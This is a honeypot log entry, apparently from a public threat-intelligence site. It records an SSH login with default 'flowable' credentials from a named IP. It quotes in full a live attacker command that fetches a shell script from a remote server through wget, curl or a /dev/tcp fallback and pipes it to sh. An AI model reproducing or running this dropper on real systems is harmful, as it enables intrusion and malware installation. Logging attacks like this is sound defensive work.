Time | 2024/09/22, 20:26:39 (GMT) |
Transaction ID | JDLWB4HQAQV2N2IA |
Service | ssh |
Location | NL (Netherlands) |
Attacker | 5.182.211.148 |
Classification | Web script execution |
Harm Potential | High |
5.182.211.148 client username 'flowable' and password 'flowable' entered 5.182.211.148 client command : 'uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; SC=$(wget -O- http://94.156.177.109/sh || curl http://94.156.177.109/sh); if [ $? -ne 0 ]; then exec 3<>"/dev/tcp/94.156.177.109/80"; echo -e "GET /sh HTTP/1.0\r\nHost: 94.156.177.109\r\n\r\n" >&3; (while read -r line; do [ "$line" = $'\r' ] && break; done && cat) <&3 | sh -s ssh; exec 3>&-; else echo "$SC" | sh -s ssh; fi'
All observations are coming from honeypot central database.
Please share your wishes, opinions and suggestions with us: Honeypots.tk Admin |
If you like, you can support |